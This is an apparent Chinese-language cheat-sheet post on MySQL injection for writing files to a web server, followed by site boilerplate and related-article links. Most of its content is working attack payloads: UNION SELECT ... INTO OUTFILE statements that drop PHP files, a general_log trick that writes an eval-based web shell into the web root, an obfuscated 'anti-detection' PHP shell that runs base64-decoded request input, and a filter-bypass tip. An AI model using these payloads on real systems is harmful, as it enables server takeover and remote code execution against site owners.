mysql注入写文件
select * from admin where id =-1 union select 1,'<?php phpinfo();?>',3,4 into outfile 'c:\\1.php'
select * from admin where id =-1 or 1=1 limit 0,1 INTO OUTFILE 'c:/2.php' LINES TERMINATED BY 0x3C3F70687020706870696E666F28293B3F3E--
3.经过数据库日志写shell
outfile被禁止,或者写入文件被拦截;
在数据库中操做以下:(必须是root权限)
show variables like '%general%'; #查看配置
set global general_log = on; #开启general log模式
set global general_log_file = '/var/www/html/1.php'; #设置日志目录为shell地址
select 'php
<?php eval($_POST[cmd]);?>
' #写入shell
SQL查询免杀shell的语句html
SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"
4.碰见其余拦截用;过滤后面的语句sql
相关文章
- 1. Mysql注入读写文件
- 2. SQL注入-Mysql注入读写文件
- 3. sql注入 - 读写文件
- 4. sql注入——读写文件
- 5. SQL注入读写文件
- 6. sql注入之 读文件 写文件 带外 二次注入 堆叠注入
- 7. sql注入之文件写入into outfile
- 8. yaml文件写入,json文件写入
- 9. MySQL注入 利用系统读、写文件
- 10. mysql 堆注入写shell
- 更多相关文章...
- • SQLite 注入 - SQLite教程
- • C# 文本文件的读写 - C#教程
- • 漫谈MySQL的锁机制
- • Docker容器实战(七) - 容器眼光下的文件系统
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. Mysql注入读写文件
- 2. SQL注入-Mysql注入读写文件
- 3. sql注入 - 读写文件
- 4. sql注入——读写文件
- 5. SQL注入读写文件
- 6. sql注入之 读文件 写文件 带外 二次注入 堆叠注入
- 7. sql注入之文件写入into outfile
- 8. yaml文件写入,json文件写入
- 9. MySQL注入 利用系统读、写文件
- 10. mysql 堆注入写shell